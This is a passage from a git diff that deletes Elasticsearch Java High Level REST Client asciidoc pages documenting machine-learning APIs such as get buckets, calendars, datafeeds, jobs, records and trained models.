-include-tagged::{doc-tests-file}[{api}-start] --------------------------------------------------- -<1> Buckets with timestamps on or after this time will be returned. - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Get buckets response - -The returned +{response}+ contains the requested buckets: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The count of buckets that were matched. -<2> The buckets retrieved. \ No newline at end of file diff --git a/docs/java-rest/high-level/ml/get-calendar-events.asciidoc b/docs/java-rest/high-level/ml/get-calendar-events.asciidoc deleted file mode 100644 index 0a687517431..00000000000 --- a/docs/java-rest/high-level/ml/get-calendar-events.asciidoc +++ /dev/null @@ -1,67 +0,0 @@ --- -:api: get-calendar-events -:request: GetCalendarEventsRequest -:response: GetCalendarEventsResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get calendar events API - -Retrieves a calendar's events. -It accepts a +{request}+ and responds -with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Get calendar events request - -A +{request}+ requires a non-null calendar ID. -Using the literal `_all` returns the events for all calendars. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new request for the specified calendarId. - -==== Optional arguments -The following arguments are optional: - - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-page] --------------------------------------------------- -<1> The page parameters `from` and `size`. `from` specifies the number of events to skip. -`size` specifies the maximum number of events to get. Defaults to `0` and `100` respectively. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-start] --------------------------------------------------- -<1> Specifies to get events with timestamps after this time. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-end] --------------------------------------------------- -<1> Specifies to get events with timestamps earlier than this time. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-jobid] --------------------------------------------------- -<1> Get events for the job. When this option is used calendar_id must be `_all`. - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Get calendar events response - -The returned +{response}+ contains the requested events: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The count of events that were matched. -<2> The events retrieved. \ No newline at end of file diff --git a/docs/java-rest/high-level/ml/get-calendars.asciidoc b/docs/java-rest/high-level/ml/get-calendars.asciidoc deleted file mode 100644 index a2e30ce9394..00000000000 --- a/docs/java-rest/high-level/ml/get-calendars.asciidoc +++ /dev/null @@ -1,56 +0,0 @@ --- -:api: get-calendars -:request: GetCalendarsRequest -:response: GetCalendarsResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get calendars API - -Retrieves one or more calendar objects. -It accepts a +{request}+ and responds -with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Get calendars request - -By default, a +{request}+ with no calendar ID set will return all -calendars. Using the literal `_all` also returns all calendars. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new request for all calendars. - -==== Optional arguments -The following arguments are optional: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-id] --------------------------------------------------- -<1> Construct a request for the single calendar `holidays`. - - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-page] --------------------------------------------------- -<1> The page parameters `from` and `size`. `from` specifies the number of -calendars to skip. `size` specifies the maximum number of calendars to get. -Defaults to `0` and `100` respectively. - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Get calendars response - -The returned +{response}+ contains the requested calendars: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The count of calendars that were matched. -<2> The calendars retrieved. \ No newline at end of file diff --git a/docs/java-rest/high-level/ml/get-categories.asciidoc b/docs/java-rest/high-level/ml/get-categories.asciidoc deleted file mode 100644 index bcb5ed89253..00000000000 --- a/docs/java-rest/high-level/ml/get-categories.asciidoc +++ /dev/null @@ -1,53 +0,0 @@ --- -:api: get-categories -:request: GetCategoriesRequest -:response: GetCategoriesResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get categories API - -Retrieves one or more category results. -It accepts a +{request}+ object and responds with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Get categories request - -A +{request}+ object gets created with an existing non-null `jobId`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new request referencing an existing `jobId`. - -==== Optional arguments -The following arguments are optional: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-category-id] --------------------------------------------------- -<1> The ID of the category to get. Otherwise, it will return all categories. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-page] --------------------------------------------------- -<1> The page parameters `from` and `size`. `from` specifies the number of -categories to skip. `size` specifies the maximum number of categories to get. -Defaults to `0` and `100` respectively. - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Get categories response - -The returned +{response}+ contains the requested categories: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The count of categories that were matched. -<2> The categories retrieved. \ No newline at end of file diff --git a/docs/java-rest/high-level/ml/get-data-frame-analytics-stats.asciidoc b/docs/java-rest/high-level/ml/get-data-frame-analytics-stats.asciidoc deleted file mode 100644 index 98fa1815478..00000000000 --- a/docs/java-rest/high-level/ml/get-data-frame-analytics-stats.asciidoc +++ /dev/null @@ -1,39 +0,0 @@ --- -:api: get-data-frame-analytics-stats -:request: GetDataFrameAnalyticsStatsRequest -:response: GetDataFrameAnalyticsStatsResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get {dfanalytics-jobs} stats API - -experimental::[] - -Retrieves the operational statistics of one or more {dfanalytics-jobs}. -The API accepts a +{request}+ object and returns a +{response}+. - -[id="{upid}-{api}-request"] -==== Get {dfanalytics-jobs} stats request - -A +{request}+ requires either a {dfanalytics-job} ID, a comma-separated list of -IDs, or the special wildcard `_all` to get the statistics for all -{dfanalytics-jobs}. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new GET stats request referencing an existing -{dfanalytics-job} - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ contains the requested {dfanalytics-job} statistics. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- \ No newline at end of file diff --git a/docs/java-rest/high-level/ml/get-data-frame-analytics.asciidoc b/docs/java-rest/high-level/ml/get-data-frame-analytics.asciidoc deleted file mode 100644 index 20684c0d020..00000000000 --- a/docs/java-rest/high-level/ml/get-data-frame-analytics.asciidoc +++ /dev/null @@ -1,37 +0,0 @@ --- -:api: get-data-frame-analytics -:request: GetDataFrameAnalyticsRequest -:response: GetDataFrameAnalyticsResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get {dfanalytics-jobs} API - -experimental::[] - -Retrieves one or more {dfanalytics-jobs}. -The API accepts a +{request}+ object and returns a +{response}+. - -[id="{upid}-{api}-request"] -==== Get {dfanalytics-jobs} request - -A +{request}+ requires either a {dfanalytics-job} ID, a comma-separated list of -IDs, or the special wildcard `_all` to get all {dfanalytics-jobs}. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new GET request referencing an existing {dfanalytics-job} - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ contains the requested {dfanalytics-jobs}. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- diff --git a/docs/java-rest/high-level/ml/get-datafeed-stats.asciidoc b/docs/java-rest/high-level/ml/get-datafeed-stats.asciidoc deleted file mode 100644 index 16055098162..00000000000 --- a/docs/java-rest/high-level/ml/get-datafeed-stats.asciidoc +++ /dev/null @@ -1,40 +0,0 @@ --- -:api: get-datafeed-stats -:request: GetDatafeedStatsRequest -:response: GetDatafeedStatsResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get datafeed stats API - -Retrieves any number of {ml} datafeeds' statistics in the cluster. -It accepts a +{request}+ object and responds with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Get datafeed stats request - -A +{request}+ object can have any number of `datafeedId` entries. However, they -all must be non-null. An empty list is the same as requesting statistics for all -datafeeds. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new request referencing existing `datafeedIds`. It can -contain wildcards. -<2> Whether to ignore if a wildcard expression matches no datafeeds. - (This includes `_all` string or when no datafeeds have been specified). - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Get datafeed stats response -The returned +{response}+ contains the requested datafeed statistics: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> `count()` indicates the number of datafeeds statistics found. -<2> `datafeedStats()` is the collection of {ml} `DatafeedStats` objects found. \ No newline at end of file diff --git a/docs/java-rest/high-level/ml/get-datafeed.asciidoc b/docs/java-rest/high-level/ml/get-datafeed.asciidoc deleted file mode 100644 index a0ca8f29756..00000000000 --- a/docs/java-rest/high-level/ml/get-datafeed.asciidoc +++ /dev/null @@ -1,39 +0,0 @@ --- -:api: get-datafeed -:request: GetDatafeedRequest -:response: GetDatafeedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get datafeeds API - -Retrieves configuration information about {ml} datafeeds in the cluster. -It accepts a +{request}+ object and responds with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Get datafeeds request - -A +{request}+ object gets can have any number of `datafeedId` entries. However, -they all must be non-null. An empty list is the same as requesting for all -datafeeds. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new request referencing existing `datafeedIds`. It can -contain wildcards. -<2> Whether to ignore if a wildcard expression matches no datafeeds. - (This includes `_all` string or when no datafeeds have been specified). - -[id="{upid}-{api}-response"] -==== Get datafeeds response - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The count of retrieved datafeeds. -<2> The retrieved datafeeds. - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/ml/get-filters.asciidoc b/docs/java-rest/high-level/ml/get-filters.asciidoc deleted file mode 100644 index 5d33e1e2d19..00000000000 --- a/docs/java-rest/high-level/ml/get-filters.asciidoc +++ /dev/null @@ -1,52 +0,0 @@ --- -:api: get-filters -:request: GetFiltersRequest -:response: GetFiltersResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get filters API - -Retrieves one or more filter results. -It accepts a +{request}+ object and responds with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Get filters request - -A +{request}+ object gets created. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new request. - -==== Optional arguments -The following arguments are optional: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-filter-id] --------------------------------------------------- -<1> The ID of the filter to get. Otherwise, it will return all filters. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-page-params] --------------------------------------------------- -<1> `from` specifies the number of filters to skip. Defaults to `0`. -<2> `size` specifies the maximum number of filters to get. Defaults to `100`. - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Get filters response - -The returned +{response}+ contains the requested filters: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The count of filters that were matched. -<2> The filters retrieved. \ No newline at end of file diff --git a/docs/java-rest/high-level/ml/get-influencers.asciidoc b/docs/java-rest/high-level/ml/get-influencers.asciidoc deleted file mode 100644 index 9096a103911..00000000000 --- a/docs/java-rest/high-level/ml/get-influencers.asciidoc +++ /dev/null @@ -1,84 +0,0 @@ --- -:api: get-influencers -:request: GetInfluencersRequest -:response: GetInfluencersResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get influencers API - -Retrieves one or more influencer results. -It accepts a +{request}+ object and responds with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Get influencers request - -A +{request}+ object gets created with an existing non-null `jobId`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new request referencing an existing `jobId`. - -==== Optional arguments -The following arguments are optional: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-desc] --------------------------------------------------- -<1> If `true`, the influencers are sorted in descending order. Defaults to `false`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-end] --------------------------------------------------- -<1> Influencers with timestamps earlier than this time will be returned. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-exclude-interim] --------------------------------------------------- -<1> If `true`, interim results will be excluded. Defaults to `false`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-influencer-score] --------------------------------------------------- -<1> Influencers with `influencer_score` greater than or equal to this value will -be returned. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-page] --------------------------------------------------- -<1> The page parameters `from` and `size`. `from` specifies the number of -influencers to skip. `size` specifies the maximum number of influencers to get. -Defaults to `0` and `100` respectively. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-sort] --------------------------------------------------- -<1> The field to sort influencers on. Defaults to `influencer_score`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-start] --------------------------------------------------- -<1> Influencers with timestamps on or after this time will be returned. - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Get influencers response - -The returned +{response}+ contains the requested influencers: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The count of influencers that were matched. -<2> The influencers retrieved. \ No newline at end of file diff --git a/docs/java-rest/high-level/ml/get-info.asciidoc b/docs/java-rest/high-level/ml/get-info.asciidoc deleted file mode 100644 index 662a007f293..00000000000 --- a/docs/java-rest/high-level/ml/get-info.asciidoc +++ /dev/null @@ -1,35 +0,0 @@ --- -:api: get-ml-info -:request: MlInfoRequest -:response: MlInfoResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get {ml} info API - -Provides defaults and limits used internally by {ml}. -These may be useful to a user interface that needs to interpret machine learning -configurations where certain fields are missing because the end user was happy -with the default value. - -It accepts a +{request}+ object and responds with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Get {ml} info request - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new request. - -[id="{upid}-{api}-response"] -==== Get {ml} info response - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> `info` from the +{response}+ contains {ml} info details. - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/ml/get-job-stats.asciidoc b/docs/java-rest/high-level/ml/get-job-stats.asciidoc deleted file mode 100644 index cc391cace7f..00000000000 --- a/docs/java-rest/high-level/ml/get-job-stats.asciidoc +++ /dev/null @@ -1,40 +0,0 @@ --- -:api: get-job-stats -:request: GetJobStatsRequest -:response: GetJobStatsResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get {anomaly-job} stats API - -Retrieves statistics for any number of {anomaly-jobs} in the cluster. -It accepts a +{request}+ object and responds with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Get {anomaly-job} stats request - -A `GetJobsStatsRequest` object can have any number of `jobId` -entries. However, they all must be non-null. An empty list is the same as -requesting statistics for all {anomaly-jobs}. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new request referencing existing `jobIds`. It can contain -wildcards. -<2> Whether to ignore if a wildcard expression matches no {anomaly-jobs}. - (This includes `_all` string or when no jobs have been specified). - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Get {anomaly-job} stats response -The returned +{response}+ contains the requested job statistics: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> `getCount()` indicates the number of jobs statistics found. -<2> `getJobStats()` is the collection of {ml} `JobStats` objects found. \ No newline at end of file diff --git a/docs/java-rest/high-level/ml/get-job.asciidoc b/docs/java-rest/high-level/ml/get-job.asciidoc deleted file mode 100644 index 3fde9b98f31..00000000000 --- a/docs/java-rest/high-level/ml/get-job.asciidoc +++ /dev/null @@ -1,39 +0,0 @@ --- -:api: get-job -:request: GetJobRequest -:response: GetJobResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get {anomaly-jobs} API - -Retrieves configuration information for {anomaly-jobs} in the cluster. -It accepts a +{request}+ object and responds with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Get {anomaly-jobs} request - -A +{request}+ object gets can have any number of `jobId` or `groupName` -entries. However, they all must be non-null. An empty list is the same as -requesting for all {anomaly-jobs}. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new request referencing existing `jobIds`. It can contain -wildcards. -<2> Whether to ignore if a wildcard expression matches no {anomaly-jobs}. - (This includes `_all` string or when no jobs have been specified). - -[id="{upid}-{api}-response"] -==== Get {anomaly-jobs} response - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> `getCount()` from the +{response}+ indicates the number of jobs found. -<2> `getJobs()` is the collection of {ml} `Job` objects found. - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/ml/get-model-snapshots.asciidoc b/docs/java-rest/high-level/ml/get-model-snapshots.asciidoc deleted file mode 100644 index d0cc7a3887f..00000000000 --- a/docs/java-rest/high-level/ml/get-model-snapshots.asciidoc +++ /dev/null @@ -1,77 +0,0 @@ --- -:api: get-model-snapshots -:request: GetModelSnapshotsRequest -:response: GetModelSnapshotsResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get model snapshots API - -Retrieves one or more model snapshot results. -It accepts a +{request}+ object and responds with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Get model snapshots request - -A +{request}+ object gets created with an existing non-null `jobId`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new request referencing an existing `jobId`. - -==== Optional arguments -The following arguments are optional: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-snapshot-id] --------------------------------------------------- -<1> The ID of the snapshot to get. Otherwise, it will return all snapshots. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-desc] --------------------------------------------------- -<1> If `true`, the snapshots are sorted in descending order. Defaults to `false`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-end] --------------------------------------------------- -<1> Snapshots with timestamps earlier than this time will be returned. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-sort] --------------------------------------------------- -<1> The field to sort snapshots on. Defaults to `timestamp`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-start] --------------------------------------------------- -<1> Snapshots with timestamps on or after this time will be returned. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-page] --------------------------------------------------- -<1> The page parameters `from` and `size`. `from` specifies the number of -snapshots to skip. `size` specifies the maximum number of snapshots to retrieve. -Defaults to `0` and `100` respectively. - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Get model snapshots response - -The returned +{response}+ contains the requested snapshots: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The count of snapshots that were matched. -<2> The snapshots retrieved. \ No newline at end of file diff --git a/docs/java-rest/high-level/ml/get-overall-buckets.asciidoc b/docs/java-rest/high-level/ml/get-overall-buckets.asciidoc deleted file mode 100644 index 4fd7b806345..00000000000 --- a/docs/java-rest/high-level/ml/get-overall-buckets.asciidoc +++ /dev/null @@ -1,82 +0,0 @@ --- -:api: get-overall-buckets -:request: GetOverallBucketsRequest -:response: GetOverallBucketsResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get overall buckets API - -Retrieves overall bucket results that summarize the bucket results of multiple -{anomaly-jobs}. -It accepts a +{request}+ object and responds -with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Get overall buckets request - -A +{request}+ object gets created with one or more `jobId`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new request referencing job IDs `jobId1` and `jobId2`. - -==== Optional arguments -The following arguments are optional: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-bucket-span] --------------------------------------------------- -<1> The span of the overall buckets. Must be greater or equal to the jobs' -largest `bucket_span`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-end] --------------------------------------------------- -<1> Overall buckets with timestamps earlier than this time will be returned. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-exclude-interim] --------------------------------------------------- -<1> If `true`, interim results will be excluded. Overall buckets are interim if -any of the job buckets within the overall bucket interval are interim. Defaults -to `false`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-overall-score] --------------------------------------------------- -<1> Overall buckets with overall scores greater or equal than this value will be -returned. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-start] --------------------------------------------------- -<1> Overall buckets with timestamps on or after this time will be returned. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-top-n] --------------------------------------------------- -<1> The number of top job bucket scores to be used in the `overall_score` -calculation. Defaults to `1`. - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Get overall buckets response - -The returned +{response}+ contains the requested buckets: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The count of overall buckets that were matched. -<2> The overall buckets retrieved. \ No newline at end of file diff --git a/docs/java-rest/high-level/ml/get-records.asciidoc b/docs/java-rest/high-level/ml/get-records.asciidoc deleted file mode 100644 index cd71345b2ca..00000000000 --- a/docs/java-rest/high-level/ml/get-records.asciidoc +++ /dev/null @@ -1,83 +0,0 @@ --- -:api: get-records -:request: GetRecordsRequest -:response: GetRecordsResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get records API - -Retrieves one or more record results. -It accepts a +{request}+ object and responds with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Get records request - -A +{request}+ object gets created with an existing non-null `jobId`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new request referencing an existing `jobId`. - -==== Optional arguments -The following arguments are optional: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-desc] --------------------------------------------------- -<1> If `true`, the records are sorted in descending order. Defaults to `false`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-end] --------------------------------------------------- -<1> Records with timestamps earlier than this time will be returned. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-exclude-interim] --------------------------------------------------- -<1> If `true`, interim results will be excluded. Defaults to `false`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-page] --------------------------------------------------- -<1> The page parameters `from` and `size`. `from` specifies the number of -records to skip. `size` specifies the maximum number of records to get. Defaults -to `0` and `100` respectively. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-record-score] --------------------------------------------------- -<1> Records with record_score greater or equal than this value will be returned. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-sort] --------------------------------------------------- -<1> The field to sort records on. Defaults to `record_score`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-start] --------------------------------------------------- -<1> Records with timestamps on or after this time will be returned. - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Get records response - -The returned +{response}+ contains the requested records: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The count of records that were matched. -<2> The records retrieved. \ No newline at end of file diff --git a/docs/java-rest/high-level/ml/get-trained-models-stats.asciidoc b/docs/java-rest/high-level/ml/get-trained-models-stats.asciidoc deleted file mode 100644 index 532c3942f0d..00000000000 --- a/docs/java-rest/high-level/ml/get-trained-models-stats.asciidoc +++ /dev/null @@ -1,42 +0,0 @@ --- -:api: get-trained-models-stats -:request: GetTrainedModelsStatsRequest -:response: GetTrainedModelsStatsResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get trained models stats API - -experimental::[] - -Retrieves one or more trained model statistics. -The API accepts a +{request}+ object and returns a +{response}+. - -[id="{upid}-{api}-request"] -==== Get trained models stats request - -A +{request}+ requires either a trained model ID, a comma-separated list of -IDs, or the special wildcard `_all` to get stats for all trained models. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new GET request referencing an existing Trained Model -<2> Set the paging parameters -<3> Allow empty response if no trained models match the provided ID patterns. - If false, an error will be thrown if no trained models match the - ID patterns. - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ contains the statistics -for the requested trained model. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- diff --git a/docs/java-rest/high-level/ml/get-trained-models.asciidoc b/docs/java-rest/high-level/ml/get-trained-models.asciidoc deleted file mode 100644 index 5af74d2c256..00000000000 --- a/docs/java-rest/high-level/ml/get-trained-models.asciidoc +++ /dev/null @@ -1,53 +0,0 @@ --- -:api: get-trained-models -:request: GetTrainedModelsRequest -:response: GetTrainedModelsResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get trained models API - -experimental::[] - -Retrieves one or more trained models. -The API accepts a +{request}+ object and returns a +{response}+. - -[id="{upid}-{api}-request"] -==== Get trained models request - -A +{request}+ requires either a trained model ID, a comma-separated list of -IDs, or the special wildcard `_all` to get all trained models. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new GET request referencing an existing trained model. -<2> Set the paging parameters. -<3> Indicate if the complete model definition should be included. -<4> Indicate if the total feature importance for the features used in training - should is included in the metadata. -<5> Indicate if the feature importance baselines that were used in training are - included in the metadata. -<6> Should the definition be fully decompressed on GET. -<7> Allow empty response if no trained models match the provided ID patterns. - If false, an error will be thrown if no trained models match the - ID patterns. -<8> An optional list of tags used to narrow the model search. A trained model - can have many tags or none. The trained models in the response will - contain all the provided tags. -<9> Optional boolean value for requesting the trained model in a format that can - then be put into another cluster. Certain fields that can only be set when - the model is imported are removed. - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ contains the requested trained model. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- diff --git a/docs/java-rest/high-level/ml/open-job.asciidoc b/docs/java-rest/high-level/ml/open-job.asciidoc deleted file mode 100644 index d88933b4f8f..00000000000 --- a/docs/java-rest/high-level/ml/open-job.asciidoc +++ /dev/null @@ -1,41 +0,0 @@ --- -:api: open-job -:request: OpenJobRequest -:response: OpenJobResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Open {anomaly-jobs} API - -Opens {anomaly-jobs} in the cluster. It accepts a +{request}+ object and -responds with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Open {anomaly-jobs} request - -An +{request}+ object gets created with an existing non-null `jobId`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- 